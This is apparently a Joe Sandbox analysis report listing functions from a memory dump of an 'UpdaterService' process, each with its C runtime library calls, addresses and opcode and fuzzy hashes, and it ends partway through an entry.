API String ID: 856385010-0
Opcode ID: a72594d4c8fa1485c4065ec94746957851426daaa9a1c50ea9830ad58a714814
Instruction ID: 12286a7eca10762eae598ed27dac362cf73dfba363f0cfc1a6352ff00d09e504
Opcode Fuzzy Hash: a72594d4c8fa1485c4065ec94746957851426daaa9a1c50ea9830ad58a714814
Instruction Fuzzy Hash: 8751FEB1D04259ABEF14DF64DC80A9EB7B9EF48308F10449EA659A3340EB716E84CF59

Function 0467C5C6 Relevance: 9.2, APIs: 6, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 0467C7A1: _wcscmp.LIBCMT ref: 0467C891
Part of subcall function 0467C7A1: _wcscmp.LIBCMT ref: 0467C8A4

_malloc.LIBCMT ref: 0467C6C3
_malloc.LIBCMT ref: 0467C6CD
_free.LIBCMT ref: 0467C70F
_free.LIBCMT ref: 0467C716
_free.LIBCMT ref: 0467C781
_free.LIBCMT ref: 0467C789

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _free$_malloc_wcscmp
String ID:
API String ID: 856385010-0
Opcode ID: a72594d4c8fa1485c4065ec94746957851426daaa9a1c50ea9830ad58a714814
Instruction ID: 12286a7eca10762eae598ed27dac362cf73dfba363f0cfc1a6352ff00d09e504
Opcode Fuzzy Hash: a72594d4c8fa1485c4065ec94746957851426daaa9a1c50ea9830ad58a714814
Instruction Fuzzy Hash: 8751FEB1D04259ABEF14DF64DC80A9EB7B9EF48308F10449EA659A3340EB716E84CF59

Function 04678668 Relevance: 9.1, APIs: 6, Instructions: 138COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 046786AA
_wcsncpy.LIBCMT ref: 046786DC
_wcsncpy.LIBCMT ref: 0467870F
_wcsncpy.LIBCMT ref: 04678751
_wcsncpy.LIBCMT ref: 0467878B
_wcsncpy.LIBCMT ref: 046787BA

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcsncpy
String ID:
API String ID: 1735881322-0
Opcode ID: 4426d9684cc74e1e60c53192683b1faf9835b652bcf97710d7796a323c007445
Instruction ID: accd57c77c9abb99dd59b263f08a371d1c96618129487af51a955c9194660ad4
Opcode Fuzzy Hash: 4426d9684cc74e1e60c53192683b1faf9835b652bcf97710d7796a323c007445
Instruction Fuzzy Hash: 05419266C1029475DB10FBB5CC899CFB3B8AF04315F61886AE509E3220F634B615C7EA

Function 04678668 Relevance: 9.1, APIs: 6, Instructions: 138COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 046786AA
_wcsncpy.LIBCMT ref: 046786DC
_wcsncpy.LIBCMT ref: 0467870F
_wcsncpy.LIBCMT ref: 04678751
_wcsncpy.LIBCMT ref: 0467878B
_wcsncpy.LIBCMT ref: 046787BA

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcsncpy
String ID:
API String ID: 1735881322-0
Opcode ID: 4426d9684cc74e1e60c53192683b1faf9835b652bcf97710d7796a323c007445
Instruction ID: accd57c77c9abb99dd59b263f08a371d1c96618129487af51a955c9194660ad4
Opcode Fuzzy Hash: 4426d9684cc74e1e60c53192683b1faf9835b652bcf97710d7796a323c007445
Instruction Fuzzy Hash: 05419266C1029475DB10FBB5CC899CFB3B8AF04315F61886AE509E3220F634B615C7EA

Function 0467D2E2 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0467D324
_memset.LIBCMT ref: 0467D3A5
_wcsncpy.LIBCMT ref: 0467D3E1

Strings

\, xrefs: 0467D33A
:, xrefs: 0467D345

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: __swprintf_memset_wcsncpy
String ID: :$\
API String ID: 214737766-1166558509
Opcode ID: cfb0cb1c51b1db7bf590a18c78a419172642f7eb61997110ed4f259503a81d07
Instruction ID: 1535a6ccf232e8a73fd1018a11093dd97f09665a9d7eeaf707685f8de3aecb37
Opcode Fuzzy Hash: cfb0cb1c51b1db7bf590a18c78a419172642f7eb61997110ed4f259503a81d07
Instruction Fuzzy Hash: 1A319271900259ABDB209FA4DC48FEB33BCEF99701F1045B6F509D2164EB74A6448B28

Function 0467D2E2 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0467D324
_memset.LIBCMT ref: 0467D3A5
_wcsncpy.LIBCMT ref: 0467D3E1

Strings

\, xrefs: 0467D33A
:, xrefs: 0467D345

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: __swprintf_memset_wcsncpy
String ID: :$\
API String ID: 214737766-1166558509
Opcode ID: cfb0cb1c51b1db7bf590a18c78a419172642f7eb61997110ed4f259503a81d07
Instruction ID: 1535a6ccf232e8a73fd1018a11093dd97f09665a9d7eeaf707685f8de3aecb37
Opcode Fuzzy Hash: cfb0cb1c51b1db7bf590a18c78a419172642f7eb61997110ed4f259503a81d07
Instruction Fuzzy Hash: 1A319271900259ABDB209FA4DC48FEB33BCEF99701F1045B6F509D2164EB74A6448B28

Function 04633A96 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 04633AAE

Part of subcall function 046383EC: __FF_MSGBANNER.LIBCMT ref: 04638403
Part of subcall function 046383EC: __NMSG_WRITE.LIBCMT ref: 0463840A

std::exception::exception.LIBCMT ref: 04633ACC
__CxxThrowException@8.LIBCMT ref: 04633AE1

Strings

h=I, xrefs: 04633AC1
`=I, xrefs: 04633AD9

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: `=I$h=I
API String ID: 4063778783-4154568363
Opcode ID: eef547696d376b44da4d1d27765ab87fc3cadfc650ec64442c2c15500ecc1508
Instruction ID: 55e96edc7e954a776a38c130ea59a7139133348c35240c95b8c04dbd30e67317
Opcode Fuzzy Hash: eef547696d376b44da4d1d27765ab87fc3cadfc650ec64442c2c15500ecc1508
Instruction Fuzzy Hash: CBF0F43160424D66DB10FE98DC14ADE7BAC9F1131BF00456AFC04A6391FBB0BA81C2E8

Function 04633A96 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 04633AAE

Part of subcall function 046383EC: __FF_MSGBANNER.LIBCMT ref: 04638403
Part of subcall function 046383EC: __NMSG_WRITE.LIBCMT ref: 0463840A

std::exception::exception.LIBCMT ref: 04633ACC
__CxxThrowException@8.LIBCMT ref: 04633AE1

Strings

h=I, xrefs: 04633AC1
`=I, xrefs: 04633AD9

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: `=I$h=I
API String ID: 4063778783-4154568363
Opcode ID: eef547696d376b44da4d1d27765ab87fc3cadfc650ec64442c2c15500ecc1508
Instruction ID: 55e96edc7e954a776a38c130ea59a7139133348c35240c95b8c04dbd30e67317
Opcode Fuzzy Hash: eef547696d376b44da4d1d27765ab87fc3cadfc650ec64442c2c15500ecc1508
Instruction Fuzzy Hash: CBF0F43160424D66DB10FE98DC14ADE7BAC9F1131BF00456AFC04A6391FBB0BA81C2E8

Function 0466DBEA Relevance: 7.8, APIs: 5, Instructions: 273COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0466DCCC
_wcscmp.LIBCMT ref: 0466DCDF
_wcscmp.LIBCMT ref: 0466DD70
_wcscmp.LIBCMT ref: 0466DEE2
_wcscmp.LIBCMT ref: 0466DF1C

Part of subcall function 0463630C: _iswctype.LIBCMT ref: 04636314

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscmp$__swprintf_iswctype
String ID:
API String ID: 3564621516-0
Opcode ID: b6c416094dae880df5529a81eb0ad6b23abd5d5a098e31691a9272e6ed33ced1
Instruction ID: c46b68eac967db796d28b028de6ce0d7f450773db653a675d7c533c786387910
Opcode Fuzzy Hash: b6c416094dae880df5529a81eb0ad6b23abd5d5a098e31691a9272e6ed33ced1
Instruction Fuzzy Hash: E8A1AE71304746AFD714DF64C884BEAB7A9FF64354F00852EE99AC2290EB30F955CB91

Function 0466DBEA Relevance: 7.8, APIs: 5, Instructions: 273COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0466DCCC
_wcscmp.LIBCMT ref: 0466DCDF
_wcscmp.LIBCMT ref: 0466DD70
_wcscmp.LIBCMT ref: 0466DEE2
_wcscmp.LIBCMT ref: 0466DF1C

Part of subcall function 0463630C: _iswctype.LIBCMT ref: 04636314

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscmp$__swprintf_iswctype
String ID:
API String ID: 3564621516-0
Opcode ID: b6c416094dae880df5529a81eb0ad6b23abd5d5a098e31691a9272e6ed33ced1
Instruction ID: c46b68eac967db796d28b028de6ce0d7f450773db653a675d7c533c786387910
Opcode Fuzzy Hash: b6c416094dae880df5529a81eb0ad6b23abd5d5a098e31691a9272e6ed33ced1
Instruction Fuzzy Hash: E8A1AE71304746AFD714DF64C884BEAB7A9FF64354F00852EE99AC2290EB30F955CB91

Function 046380ED Relevance: 7.7, APIs: 5, Instructions: 163COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0463814B
_memcpy_s.LIBCMT ref: 046381BD
__read_nolock.LIBCMT ref: 0463821B
__filbuf.LIBCMT ref: 0463823E
_memset.LIBCMT ref: 04638282

Part of subcall function 0463B808: __getptd_noexit.LIBCMT ref: 0463B808

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: bf4fbc9f25857a78a0467b7c9a9a3b84207d8c22229e96b346ce8dd8a34d16b8
Instruction ID: af447f5f5fe35306301736907f3fe85b1dc99c8bdf76b3c8ef39b42f2bb1f93a
Opcode Fuzzy Hash: bf4fbc9f25857a78a0467b7c9a9a3b84207d8c22229e96b346ce8dd8a34d16b8
Instruction Fuzzy Hash: 2B518F30A00786DBDB24EEA988806EE77E1AF51366F14872DF825973D0F774BD519B80

Function 046380ED Relevance: 7.7, APIs: 5, Instructions: 163COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0463814B
_memcpy_s.LIBCMT ref: 046381BD
__read_nolock.LIBCMT ref: 0463821B
__filbuf.LIBCMT ref: 0463823E
_memset.LIBCMT ref: 04638282

Part of subcall function 0463B808: __getptd_noexit.LIBCMT ref: 0463B808

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: bf4fbc9f25857a78a0467b7c9a9a3b84207d8c22229e96b346ce8dd8a34d16b8
Instruction ID: af447f5f5fe35306301736907f3fe85b1dc99c8bdf76b3c8ef39b42f2bb1f93a
Opcode Fuzzy Hash: bf4fbc9f25857a78a0467b7c9a9a3b84207d8c22229e96b346ce8dd8a34d16b8
Instruction Fuzzy Hash: 2B518F30A00786DBDB24EEA988806EE77E1AF51366F14872DF825973D0F774BD519B80

Function 0466F2E7 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0466F2FC
_memcmp.LIBCMT ref: 0466F31A
_memcmp.LIBCMT ref: 0466F32D
_memcmp.LIBCMT ref: 0466F345
_memcmp.LIBCMT ref: 0466F35D

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f453c28d498847b69d6cb65704602ca5d64119842fa6af63049dead29c41668f
Instruction ID: b3727b3c0c56037e91ecfc59d2f48e593a0408eb469f9155ea95918da1963ffd
Opcode Fuzzy Hash: f453c28d498847b69d6cb65704602ca5d64119842fa6af63049dead29c41668f
Instruction Fuzzy Hash: 8401B572700615BBEA186919BD41F7BB75C9B6168AF004026FD06B7341FB68FE1192EC

Function 0466F2E7 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0466F2FC
_memcmp.LIBCMT ref: 0466F31A
_memcmp.LIBCMT ref: 0466F32D
_memcmp.LIBCMT ref: 0466F345
_memcmp.LIBCMT ref: 0466F35D

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f453c28d498847b69d6cb65704602ca5d64119842fa6af63049dead29c41668f
Instruction ID: b3727b3c0c56037e91ecfc59d2f48e593a0408eb469f9155ea95918da1963ffd
Opcode Fuzzy Hash: f453c28d498847b69d6cb65704602ca5d64119842fa6af63049dead29c41668f
Instruction Fuzzy Hash: 8401B572700615BBEA186919BD41F7BB75C9B6168AF004026FD06B7341FB68FE1192EC

Function 04681C16 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 04626E1A: _wcscpy.LIBCMT ref: 04626E3D

_wcstok.LIBCMT ref: 04681D87
_wcscpy.LIBCMT ref: 04681E16
_memset.LIBCMT ref: 04681E49

Strings

X, xrefs: 04681E86

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscpy$_memset_wcstok
String ID: X
API String ID: 1534480898-3081909835
Opcode ID: 183160972c63fa44f051d72cde3c661b9daeabada2f807a90b119d7ad0d1c5de
Instruction ID: 9cdbc476251dd691ca072c5d5a1030b49120d0e738f9eed013bd783c41ac94a1
Opcode Fuzzy Hash: 183160972c63fa44f051d72cde3c661b9daeabada2f807a90b119d7ad0d1c5de
Instruction Fuzzy Hash: 1CC18E70504751AFD714EF24C984A9AB7E4BF85318F04492EE89A9B3A0EB30F945CF96

Function 04681C16 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 04626E1A: _wcscpy.LIBCMT ref: 04626E3D

_wcstok.LIBCMT ref: 04681D87
_wcscpy.LIBCMT ref: 04681E16
_memset.LIBCMT ref: 04681E49

Strings

X, xrefs: 04681E86

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscpy$_memset_wcstok
String ID: X
API String ID: 1534480898-3081909835
Opcode ID: 183160972c63fa44f051d72cde3c661b9daeabada2f807a90b119d7ad0d1c5de
Instruction ID: 9cdbc476251dd691ca072c5d5a1030b49120d0e738f9eed013bd783c41ac94a1
Opcode Fuzzy Hash: 183160972c63fa44f051d72cde3c661b9daeabada2f807a90b119d7ad0d1c5de
Instruction Fuzzy Hash: 1CC18E70504751AFD714EF24C984A9AB7E4BF85318F04492EE89A9B3A0EB30F945CF96

Function 0468098C Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 04680B03
_wcscat.LIBCMT ref: 04680B1B
_wcscat.LIBCMT ref: 04680B2D

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscat$__wsplitpath
String ID:
API String ID: 1413645957-0
Opcode ID: 42d04188af3d2821253dca07e32289481f8c7399b5da3054ed29643a187f1781
Instruction ID: 0810a03d992e80eb03679318f8202033c280100da396f683d3631cb7626ff79f
Opcode Fuzzy Hash: 42d04188af3d2821253dca07e32289481f8c7399b5da3054ed29643a187f1781
Instruction Fuzzy Hash: 1081A2716043459FD760EF64C88496AB7E8BF98304F098E2EE886C7351F630F949CB56

Function 0468098C Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 04680B03
_wcscat.LIBCMT ref: 04680B1B
_wcscat.LIBCMT ref: 04680B2D

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscat$__wsplitpath
String ID:
API String ID: 1413645957-0
Opcode ID: 42d04188af3d2821253dca07e32289481f8c7399b5da3054ed29643a187f1781
Instruction ID: 0810a03d992e80eb03679318f8202033c280100da396f683d3631cb7626ff79f
Opcode Fuzzy Hash: 42d04188af3d2821253dca07e32289481f8c7399b5da3054ed29643a187f1781
Instruction Fuzzy Hash: 1081A2716043459FD760EF64C88496AB7E8BF98304F098E2EE886C7351F630F949CB56

Function 04680D0D Relevance: 6.2, APIs: 4, Instructions: 185COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 04680E49
_wcscat.LIBCMT ref: 04680E61
_wcscat.LIBCMT ref: 04680E73
_wcscpy.LIBCMT ref: 04680EFB

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscat$__wsplitpath_wcscpy
String ID:
API String ID: 3240238573-0
Opcode ID: 4029a01acd47e2cfd63ba26ddf9353f72a45e55679ee9de2d7e4eec78043ebe3
Instruction ID: 3aa6f33884ba262f0859bf070513ab025e36df261abe7aeeeba7e043488aaec1
Opcode Fuzzy Hash: 4029a01acd47e2cfd63ba26ddf9353f72a45e55679ee9de2d7e4eec78043ebe3
Instruction Fuzzy Hash: E2616D76504345AFD710EF24C88499EB3E8FF89314F058D6EE98987250EB31FA49CB96

Function 04680D0D Relevance: 6.2, APIs: 4, Instructions: 185COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 04680E49
_wcscat.LIBCMT ref: 04680E61
_wcscat.LIBCMT ref: 04680E73
_wcscpy.LIBCMT ref: 04680EFB

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscat$__wsplitpath_wcscpy
String ID:
API String ID: 3240238573-0
Opcode ID: 4029a01acd47e2cfd63ba26ddf9353f72a45e55679ee9de2d7e4eec78043ebe3
Instruction ID: 3aa6f33884ba262f0859bf070513ab025e36df261abe7aeeeba7e043488aaec1
Opcode Fuzzy Hash: 4029a01acd47e2cfd63ba26ddf9353f72a45e55679ee9de2d7e4eec78043ebe3
Instruction Fuzzy Hash: E2616D76504345AFD710EF24C88499EB3E8FF89314F058D6EE98987250EB31FA49CB96

Function 0467CF3D Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0467CFFF
__swprintf.LIBCMT ref: 0467D018
_wprintf.LIBCMT ref: 0467D0CE
_wprintf.LIBCMT ref: 0467D0EC

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: __swprintf_wprintf
String ID:
API String ID: 1937080608-0
Opcode ID: 62a455db50deac0b4fb23514372d331aa4ab71d5522a5d5cd9d744c5c90ec4c3
Instruction ID: 8d6bb2f8c0cb851e1da69c6d850cdb52751447702fe52d67e518e9180fb54a64
Opcode Fuzzy Hash: 62a455db50deac0b4fb23514372d331aa4ab71d5522a5d5cd9d744c5c90ec4c3
Instruction Fuzzy Hash: 45516F7190061ABBEF24EBA0DE40EEEB779AF14308F200169E40572190FB357E59DF68

Function 0467CF3D Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0467CFFF
__swprintf.LIBCMT ref: 0467D018
_wprintf.LIBCMT ref: 0467D0CE
_wprintf.LIBCMT ref: 0467D0EC

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: __swprintf_wprintf
String ID:
API String ID: 1937080608-0
Opcode ID: 62a455db50deac0b4fb23514372d331aa4ab71d5522a5d5cd9d744c5c90ec4c3
Instruction ID: 8d6bb2f8c0cb851e1da69c6d850cdb52751447702fe52d67e518e9180fb54a64
Opcode Fuzzy Hash: 62a455db50deac0b4fb23514372d331aa4ab71d5522a5d5cd9d744c5c90ec4c3
Instruction Fuzzy Hash: 45516F7190061ABBEF24EBA0DE40EEEB779AF14308F200169E40572190FB357E59DF68

Function 0467CD2B Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0467CDEC
__swprintf.LIBCMT ref: 0467CE05
_wprintf.LIBCMT ref: 0467CEAC
_wprintf.LIBCMT ref: 0467CECA

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: __swprintf_wprintf
String ID:
API String ID: 1937080608-0
Opcode ID: 948de1383d2a11ae39c0d49442b9735e0ae79c0a6439623eda2bf68ab2e28674
Instruction ID: 65ef61626bbec4c3032d9cbc18fe9734e37d15440bf16af4afef637668ea629f
Opcode Fuzzy Hash: 948de1383d2a11ae39c0d49442b9735e0ae79c0a6439623eda2bf68ab2e28674
Instruction Fuzzy Hash: BD516D7190061ABAEF24EBE0DE41EEEB779AF14304F20016AE50572190FB353E58DF69

Function 0467CD2B Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0467CDEC
__swprintf.LIBCMT ref: 0467CE05
_wprintf.LIBCMT ref: 0467CEAC
_wprintf.LIBCMT ref: 0467CECA

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: __swprintf_wprintf
String ID:
API String ID: 1937080608-0
Opcode ID: 948de1383d2a11ae39c0d49442b9735e0ae79c0a6439623eda2bf68ab2e28674
Instruction ID: 65ef61626bbec4c3032d9cbc18fe9734e37d15440bf16af4afef637668ea629f
Opcode Fuzzy Hash: 948de1383d2a11ae39c0d49442b9735e0ae79c0a6439623eda2bf68ab2e28674
Instruction Fuzzy Hash: BD516D7190061ABAEF24EBE0DE41EEEB779AF14304F20016AE50572190FB353E58DF69

Function 04682088 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 046820BE
_wcscmp.LIBCMT ref: 046820D5
_wcscmp.LIBCMT ref: 04682167
_wcscmp.LIBCMT ref: 0468217E

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: edd9f0fbf41bde167f3b5c2d255263708be97dc0abc0389d1a94b15b2fed4f2f
Instruction ID: 9b6068f3f3c1f56ad0de60c7d73390776b68265f8df58dc2567e5ce9794a378a
Opcode Fuzzy Hash: edd9f0fbf41bde167f3b5c2d255263708be97dc0abc0389d1a94b15b2fed4f2f
Instruction Fuzzy Hash: A131BA316412197EDB60EBF0DC58ADE77ACDF15315F2002FAEA44D2290F775EA448A68

Function 04682088 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 046820BE
_wcscmp.LIBCMT ref: 046820D5
_wcscmp.LIBCMT ref: 04682167
_wcscmp.LIBCMT ref: 0468217E

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: edd9f0fbf41bde167f3b5c2d255263708be97dc0abc0389d1a94b15b2fed4f2f
Instruction ID: 9b6068f3f3c1f56ad0de60c7d73390776b68265f8df58dc2567e5ce9794a378a
Opcode Fuzzy Hash: edd9f0fbf41bde167f3b5c2d255263708be97dc0abc0389d1a94b15b2fed4f2f
Instruction Fuzzy Hash: A131BA316412197EDB60EBF0DC58ADE77ACDF15315F2002FAEA44D2290F775EA448A68

Function 046821E5 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0468221B
_wcscmp.LIBCMT ref: 04682232
_wcscmp.LIBCMT ref: 046822AF
_wcscmp.LIBCMT ref: 046822C6

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 701ab9f914941f2bf6b29873fd7c3c33b56fc35b81b0c5937bb1c87bf486da0b
Instruction ID: 8257eb08bccafb15a14ee1883963180b48b0f533a947d8c0f835974622ceeb5d
Opcode Fuzzy Hash: 701ab9f914941f2bf6b29873fd7c3c33b56fc35b81b0c5937bb1c87bf486da0b
Instruction Fuzzy Hash: 7131FA326002197FDB20EFB0DC68ADE776CDF15324F1006EAE814A2190F771AA458A69

Function 046821E5 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0468221B
_wcscmp.LIBCMT ref: 04682232
_wcscmp.LIBCMT ref: 046822AF
_wcscmp.LIBCMT ref: 046822C6

Memory Dump Source

Source File: 00000003.00000003.2230168514.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, Offset: 045F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_45f0000_UpdaterService.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 701ab9f914941f2bf6b29873fd7c3c33b56fc35b81b0c5937bb1c87bf486da0b
Instruction ID: 8257eb08bccafb15a14ee1883963180b48b0f533a947d8c0f835974622ceeb5d
Opcode Fuzzy Hash: 701ab9f914941f2bf6b29873fd7c3c33b56fc35b81b0c5937bb1c87bf486da0b
